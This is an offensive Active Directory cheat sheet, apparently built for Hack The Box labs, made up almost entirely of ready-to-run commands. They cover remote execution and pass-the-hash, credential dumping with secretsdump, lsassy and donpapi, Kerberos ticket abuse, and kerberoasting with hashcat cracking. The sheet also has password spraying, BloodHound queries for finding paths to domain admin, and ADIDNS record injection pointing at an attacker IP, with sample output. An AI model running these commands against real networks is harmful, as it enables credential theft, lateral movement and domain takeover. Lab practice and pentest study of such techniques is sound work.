With Creds
nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami
nxc rdp RHOST -u 'USER' -p 'PASS'
nxc winrm RHOST -u 'USER' -p 'PASS' -x whoami
nxc wmi RHOST -u 'USER' -p 'PASS' -x whoami
nxc mssql RHOST -u 'USER' -p 'PASS' -x whoami
nxc ldap RHOST -u 'USER' -p 'PASS'
nxc ldap RHOST -u 'USER' -p 'PASS' -M adcs
nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami --local-auth
nxc smb RHOST -u 'USER' -p 'PASS' --shares --put-file rustscan.exe /windows/temp/rustscan.exe
nxc smb RHOST -u 'USER' --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
nxc smb RHOST -u 'Administrator' -p 'PASS' -M lsassy
nxc ldap ghost.htb -u 'USER' -p 'PASS' --gmsa
enum4linux RHOST -u 'USER' -p 'PASS'
mssqlclient.py 'USER':'PASS'@RHOST -debug -windows-auth
mkdir /tmp/share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
psexec.py 'Administrator':'pass'@1.2.3.4
psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
smbexec.py 'Administrator':'pass'@1.2.3.4
secretsdump.py Administrator:'pass'@1.2.3.4 -history
secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history
donpapi collect -u Administrator -p 'pass' -d domain.local -t 1.2.3.4 --fetch-pvk
wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
atexec.py 'user':'pass'@1.2.3.4 whoami
dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first
evil-winrm -i domain.com -u user -p 'pass' # Don't forget to add domain in /etc/hosts
Kerberos
Getting kerberos TGT (ccache)
getTGT.py 'BOX.HTB'/'USER':'PASS' -dc-ip 'DC01.BOX.HTB'
getTGT.py 'BOX.HTB'/'GMSA01' -hashes ':cfa8f6edd15de88a17a9652114e3f4a6' -dc-ip 'DC01.BOX.HTB'
export KRB5CCNAME=USER.ccache
nxc smb DC01.BOX.HTB -k --use-kcache
wmiexec.py -k DC01.BOX.HTB 'powershell.exe "whoami /all"'
cat <<'EOF'>/home/user/data/krb5.conf
[libdefaults]
default_realm = BOX.HTB
dns_canonicalize_hostname = false
rdns = false
[realms]
BOX.HTB = {
kdc = DC01.BOX.HTB
admin_server = DC01.BOX.HTB
}
[domain_realm]
BOX.HTB = BOX.HTB
.BOX.HTB = BOX.HTB
web.BOX.HTB = BOX.HTB
EOF
export KRB5_CONFIG='/home/user/data/krb5.conf'
export KRB5CCNAME='/home/user/data/user.ccache'
export KRB5_TRACE='/dev/stdout'
evil-winrm -i 'DC01.BOX.HTB' -r 'BOX.HTB' -u 'USER'
Active Directory
LDAP enumeration
ldapsearch -H 'ldap://domain.com' -D user@domain.com -w 'pass' -b "dc=domain,dc=com" "*" > /home/user/data/ldapsearch
ldeep ldap -u user -p 'pass' -d domain.com -s ldaps://1.2.3.4:636 all /home/user/data/ldeep
ldapdomaindump ldaps://1.2.3.4:3269 -u 'domain.com\user' -p 'pass'
Kerberoasting
GetUserSPNs.py -dc-ip 1.2.3.10 'domain.com/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT
Bloodhound
Install BloodHound from https://github.com/SpecterOps/BloodHound
BloodHound: v7.3.1
Using python collector to extract infos
pipx install git+https://github.com/dirkjanm/BloodHound.py@bloodhound-ce
bloodhound-ce-python --dns-tcp -u 'USER' -p 'PASS' -ns '10.129.41.25' -d 'BOX.htb' -c All,LoggedOn
Get all descriptions, users, computers
cat *.json|jq|grep -i '"description"'| cut '-d"' -f4 | sort -u | tee /home/user/data/descriptions
cat *users.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/users
cat *computers.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/computers
Enumeration
# All users group membership, excluding default low-level groups (users, everyone..)
WITH ['-513', '-S-1-1-0', '-S-1-5-11', '-S-1-5-32-554', '-S-1-5-32-545'] AS usergroups MATCH p=(u:User)-[r:MemberOf*1..]->(g:Group) WHERE NOT ANY(group IN usergroups WHERE g.objectid ENDS WITH group) RETURN p
# Domains and computers
MATCH p1 = (d:Domain) OPTIONAL MATCH p2 = (d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p3 = shortestPath((d:Domain)-[*1..]->(n:Domain)) WHERE d<>n WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path
# Users ACL
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true RETURN p
# Search for relation/activity between users and computers
WITH ['-512','-544'] AS exclude MATCH p1=(d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p2=(n)-[r:CanRDP|CanPSRemote|ExecuteDCOM|AdminTo|Owns]->(:Computer) WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) OPTIONAL MATCH p3=(:Computer)-[:HasSession]->() WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path
WITH ['-512','-544'] AS exclude MATCH p=(n)-[:HasSession|CanRDP|CanPSRemote|ExecuteDCOM|AdminTo*1..]->() WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) RETURN p
# GPOs
MATCH p1=()-[r:Owns]->(c:GPO) OPTIONAL MATCH p2=()-[:GPLink]->() WITH collect(p1) + collect(p2) AS paths UNWIND paths AS path RETURN path
MATCH p1=()-[r:Owns]->(c:GPO) RETURN p1
Leverage Owned objects
# Owned => High value (Without CanRDP,CanPSRemote,HasSession)
MATCH (m),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
# Owned => Computers
MATCH (m),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WHERE COALESCE(m.system_tags, '') CONTAINS 'owned' WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path
Easy wins
# Users/Computer => High value (Without CanRDP,CanPSRemote,HasSession)
MATCH (m:User),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
MATCH (m:Computer),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
# Users => Computers
MATCH (m:User),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path
# Any unconstrained Delegation ?
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Any constrained Delegation ?
MATCH p=()-[r:AllowedToDelegate|AllowedToAct]->() RETURN p
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate|AllowedToAct]->(t)) return p
# kerberoast ?
MATCH (n:User) WHERE n.hasspn=true RETURN n
# GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
# Or : nxc ldap 1.2.3.10 -d 'do.main' -u 'user' -p 'pass' --kerberoast /home/user/data/hashes.kerberoast
# hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
# preauth req ?
MATCH (u:User {dontreqpreauth: true}) RETURN u
# GetNPUsers.py -debug 'do.main/' -usersfile /home/user/data/users -outputfile /home/user/data/hashes.asreproast -format hashcat -dc-ip 1.2.3.10
# sudo hashcat -m 18200 /home/user/data/hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
# Pre-Created Computer Accounts ? (then try either blank or computer lowercase name without $ as password)
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset = c.whencreated and c.enabled = true RETURN p
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset < c.lastlogon - (60*60*24*45) and c.enabled = true RETURN p
cat /home/user/data/computers | tr '[:upper:]' '[:lower:]' | tr -d '$' > /home/user/data/computerspass
# nxc smb DC01 -u /home/user/data/computers -p /home/user/data/computerspass --continue-on-success --no-bruteforce
# You can try pre2k tool as well
# Ref https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts
Others (testing)
MATCH p=()-[r:HasSession]->() RETURN p
MATCH p=()-[r:Owns]->(c:Computer) RETURN p
Match (n:GPO) return n
MATCH p=(u:User)-[]->() RETURN p
MATCH p=(u:User)-[r:GenericAll]->() RETURN p
MATCH p=()-[r:GenericAll]->() RETURN p
# Domain Users
MATCH p=(d:Domain)-[r:Contains*1..]->(n:User) RETURN p
# Map of domains/groups/users
MATCH p=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN p
MATCH (m),(n:OU),p=shortestPath((m)-[*1..]->(n)) where m<>n RETURN p
MATCH p=()-[r:ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->() RETURN p
ADIDNS
In order to function properly, Active Directory services need DNS.
In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records.
This is called Active Directory Integrated DNS (ADIDNS).
If the user is allowed to, he can add DNS records.
# Example using kerberos ticket
export KRB5CCNAME="/home/user/data/user.ccache"
python3 dnstool.py -u 'DOMAIN.HTB\user' -k "DC01.DOMAIN.HTB" --tcp -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
# Example when you don't have enought rights
python3 dnstool.py -u 'DOMAIN.HTB\user' -p 'pass' 'DC01.DOMAIN.HTB' -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[!] LDAP operation failed. Message returned from server: insufficientAccessRights 00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
Adding record using bloodyAD
bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' add dnsRecord test 10.10.14.56
bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' get dnsDump